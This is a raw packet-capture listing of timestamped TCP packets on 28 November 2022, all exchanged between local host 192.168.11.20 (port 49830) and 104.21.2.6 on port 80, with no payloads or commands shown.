Nov 28, 2022 16:37:04.049258947 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.049267054 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.049276114 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.049287081 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.049298048 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.049308062 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.049318075 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.049329042 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.049339056 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.049350023 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.049360037 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.049371004 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.049381971 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.049391031 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.049473047 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.049473047 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.049631119 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.049644947 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.049666882 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.049679995 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.049690962 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.049701929 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.049806118 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.049814939 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.049814939 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.049823999 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.049834967 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.049845934 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.049856901 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.049948931 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.050118923 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.054409981 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.054558039 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.054572105 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.054584026 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.054599047 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.054610014 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.054677963 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.054845095 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.063961983 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.064049006 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.064060926 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.064074039 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.064085960 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.064121962 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.064132929 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.064143896 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.064153910 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.064167023 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.064192057 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.064205885 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.064217091 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.064248085 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.064301014 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.064327002 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.064331055 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.064331055 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.064331055 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.064348936 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.064359903 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.064371109 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.064405918 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.064416885 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.064428091 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.064440012 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.064460039 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.064471006 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.064502001 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.064517021 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.064527988 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.064538956 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.064565897 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.064578056 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.064588070 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.064599037 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.064615965 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.064626932 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.064637899 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.064649105 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.064660072 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.064670086 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.064675093 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.064687014 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.064697027 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.064707994 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.064718962 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.064733982 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.064743996 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.064754963 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.064765930 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.064776897 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.064788103 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.064819098 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.064831018 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.064841032 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.064851046 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.064891100 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.064891100 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.064891100 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.064938068 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.065104008 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.065201044 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.065275908 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.065327883 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.065340996 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.065351009 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.065361977 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.065385103 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.065445900 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.065458059 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.065469027 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.065500021 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.065512896 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.065524101 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.065535069 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.065545082 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.065551043 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.065551043 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.065563917 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.065574884 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.065586090 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.065597057 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.065620899 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.065632105 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.065643072 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.065654993 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.065665960 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.065676928 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.065701962 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.065712929 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.065720081 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.065727949 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.065738916 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.065749884 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.065892935 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.065892935 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.065892935 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.066095114 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.066175938 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.066251040 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.066276073 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.066279888 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.066294909 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.066306114 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.066318035 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.066329002 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.066339016 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.066349983 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.066385031 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.066425085 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.066437006 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.066447020 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.066450119 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.066463947 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.066474915 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.066485882 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.066495895 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.066507101 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.066518068 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.066528082 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.066553116 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.066565037 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.066622019 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.066622019 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.066714048 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.066725969 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.066737890 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.066749096 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.066760063 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.066771984 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.066782951 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.066790104 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.066960096 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.066960096 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.066960096 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.067251921 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.067264080 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.067289114 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.067300081 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.067312002 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.067322969 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.067332983 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.067343950 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.067354918 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.067610025 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.067624092 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.067636013 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.067640066 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.067640066 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.067656040 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.067667007 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.067678928 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.067688942 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.067699909 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.067711115 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.067722082 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.067733049 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.067743063 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.067754030 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.067764997 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.067775965 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.067786932 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.067796946 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.067809105 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.067811966 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.067811966 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.067826986 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.067837954 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.067848921 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.068011045 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.068150043 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.068161964 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.068325996 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.068434000 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.068445921 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.068455935 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.068466902 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.068478107 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.068490028 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.068501949 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.068511963 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.068541050 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.068552971 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.068563938 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.068574905 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.068599939 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.068612099 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.068622112 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.068633080 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.068643093 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.068654060 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.068659067 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.068670034 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.068681002 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.068691969 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.068831921 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.068999052 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.076297045 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.076513052 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.076560020 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.076589108 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.076613903 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.076623917 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.076634884 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.076646090 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.076658964 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.076669931 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.076680899 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.076690912 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.076702118 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.076713085 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.076724052 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.076735020 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.076745033 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.076756001 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.076766968 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.076776981 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.076787949 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.076798916 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.076809883 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.076819897 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.076819897 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.076829910 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.076841116 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.076852083 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.076860905 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.076867104 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.077028036 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.077038050 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.077083111 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.077095985 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.077107906 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.077119112 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.077130079 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.077142000 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.077152967 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.077164888 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.077176094 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.077188015 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.077198982 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.077207088 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.077207088 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.077218056 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.077229977 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.077241898 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.077253103 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.077265024 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.077275991 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.077286959 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.077296972 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.077406883 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.077507973 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.091624022 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.091861963 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.091893911 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.091907978 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.091917992 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.091931105 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.091942072 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.091953039 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.091964006 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.091974020 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.091984987 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.091995955 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.092005968 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.092016935 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.092027903 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.092039108 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.092050076 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.092061043 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.092072010 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.092082024 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.092092991 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.092106104 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.092116117 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.092127085 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.092138052 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.092149019 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.092154980 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.092164993 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.092308998 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.092318058 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.092344046 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.092355013 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.092365980 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.092376947 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.092386961 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.092397928 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.092408895 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.092418909 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.092430115 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.092441082 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.092451096 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.092462063 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.092472076 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.092483044 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.092487097 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.092498064 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.092509031 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.092519045 CET	80	49830	104.21.2.6	192.168.11.20
